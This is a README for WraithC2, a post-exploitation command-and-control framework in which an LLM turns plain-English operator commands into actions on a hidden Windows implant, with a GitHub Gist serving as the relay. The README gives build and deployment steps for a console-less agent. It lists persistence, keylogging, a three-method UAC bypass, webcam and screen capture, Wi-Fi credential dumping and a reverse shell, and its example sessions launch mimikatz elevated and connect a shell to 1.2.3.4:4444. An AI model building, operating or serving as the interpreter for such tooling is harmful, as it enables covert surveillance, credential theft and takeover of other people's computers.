AI-powered post-exploitation framework — GitHub Gist dead-drop transport, no open port required.
Warning
DO NOT run wraith.exe or wraith.py on your own machine or any machine you are not prepared to fully reimage.
Once executed, the agent:
- Installs registry persistence and a scheduled task that survive reboots
- Hooks the keyboard system-wide (keylogger)
- Can lock out Task Manager, prevent admin-elevated processes, and interfere with UAC prompts if instructed recklessly
- Polls an external server every few seconds — this runs silently in the background with no visible window
Always deploy inside an isolated VM with no snapshots shared with your host, network-isolated from your real environment. Running it on your daily-use machine will compromise that machine. The author takes no responsibility for self-inflicted compromise.
WraithC2 lets you control a Windows agent using plain English. Commands travel through a private GitHub Gist, so there is no listening server and no exposed IP. An LLM (NVIDIA NIM, OpenRouter, Anthropic, or Groq — your choice) interprets every instruction and executes the best action automatically.
Operator Machine Target Machine
---------------- ---------------
control.py <---- GitHub Gist ----> wraith.exe
(CLI) dead-drop (agent)
OP> @PC01: list running processes
JSON command -> Gist
agent polls Gist every 5 s
AI interprets: "processes" action
runs tasklist, posts result -> Gist
result read back
RESULT: [chrome.exe, explorer.exe ...]
No port forwarding. No VPS. No firewall rule. Just a free GitHub account.
| Category | Details |
|---|---|
| Transport | GitHub Gist dead-drop (HTTPS only, no listening port) |
| AI interpreter | Natural-language -> action via NVIDIA NIM / OpenRouter / Anthropic / Groq |
| Stealth | Single EXE, no console window, all subprocesses hidden |
| Persistence | HKCU registry run key + scheduled task (no admin needed for HKCU) |
| UAC bypass | fodhelper -> eventvwr -> sdclt (auto-sequence, three methods) |
| Keylogger | Start/stop/timed capture via pynput, auto-upload results |
| Webcam | Single camera or all connected cameras via OpenCV |
| Screenshots | Single capture or continuous stream |
| Exec code | Run PowerShell / Python / VBScript / Batch generated by AI |
| Run elevated | Launch any .exe with admin rights via ShellExecuteEx runas |
| Reverse shell | Raw TCP, auto test-connect before launching |
| File transfer | Agent->Operator via GitHub repo; Operator->Agent via gofile.io |
| Clipboard | Read current clipboard contents |
| Wi-Fi creds | Dump all saved wireless profiles |
| Narration | AI summarises every result in plain English |
git clone https://github.com/farooq9/wraithc2
cd wraithc2
python -m venv .venv
.venv\Scripts\activate # Windows
pip install -r requirements.txt
python .venv\Scripts\pywin32_postinstall.py -install # Windows onlypython control.pyOn first run (or type setup at the prompt) the wizard will ask for:
- AI provider + model
- API key
- GitHub Gist ID + Personal Access Token
- (Optional) Private repo for file drops
- (Optional) Apache upload URL for large files
It writes config.py automatically.
compile.bat # Windows — produces dist\wraith.exeOr manually:
pyinstaller --onefile --noconsole --name wraith --runtime-tmpdir . wraith.pyCopy dist\wraith.exe to the target and run it.
Back on your machine:
python control.py
OP> list
Agents (1):
DESKTOP-AB1234 last seen: 2026-03-10T06:41:00Z
OP> @DESKTOP-AB1234: take a screenshot
[sent] -> DESKTOP-AB1234 id=a1b2c3d4
[waiting for result...]
RESULT: [screenshot] https://catbox.moe/...jpg
OP> @DESKTOP-AB1234: run C:\Tools\mimikatz.exe with admin privileges and give me the PID
RESULT: [run_elevated] Launched with admin rights. PID: 4812 Status: running
OP> @DESKTOP-AB1234: capture keystrokes for 60 seconds
RESULT: [keylog_timed] Keylogger started, will auto-stop in 60s...
OP> @DESKTOP-AB1234: connect to 1.2.3.4 port 4444
RESULT: [reverse_shell] Connecting reverse shell to 1.2.3.4:4444...
| Command | Description |
|---|---|
list |
Show online agents |
@HOST: <task> |
Send any natural-language task to one agent |
all: <task> |
Broadcast task to every online agent |
results |
Read all pending results |
deliver @HOST /path |
Upload file via gofile.io -> agent downloads it |
clear @HOST / clear all |
Wipe result(s) from Gist |
setup |
Re-run configuration wizard |
build |
Show compile instructions |
help |
Full command reference |
exit |
Quit |
| Provider | Free Tier | Get Key |
|---|---|---|
| NVIDIA NIM | Yes | https://build.nvidia.com |
| OpenRouter | Yes (many :free models) | https://openrouter.ai/keys |
| Anthropic | No (paid) | https://console.anthropic.com |
| Groq | Yes | https://console.groq.com |
Run setup in the CLI to switch provider or model at any time.
wraithc2/
wraith.py Agent / implant (compile -> wraith.exe)
control.py Operator CLI (run on your machine)
config.py Shared configuration (generated by setup wizard)
compile.bat One-click agent compiler (Windows)
requirements.txt Python dependencies
README.md This file
CONTRIBUTING.md Contributing to WraithC2
requests Gist transport + HTTP uploads
pynput Keylogger / keyboard hooks
Pillow Screenshots
pywin32 Windows API (registry, clipboard, DLL injection)
opencv-python Webcam capture
pycaw Volume control
pyinstaller Compile to EXE
Full list: requirements.txt
Tip
🎥 Demo
wraithdemo.mp4
This software is intended for:
- Authorised penetration testing on systems you own or have explicit written permission to test
- Academic/educational research in controlled environments
- Red team exercises with proper engagement authorisation
Unauthorised use against systems you do not own is illegal under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent laws worldwide. The authors accept no responsibility for misuse.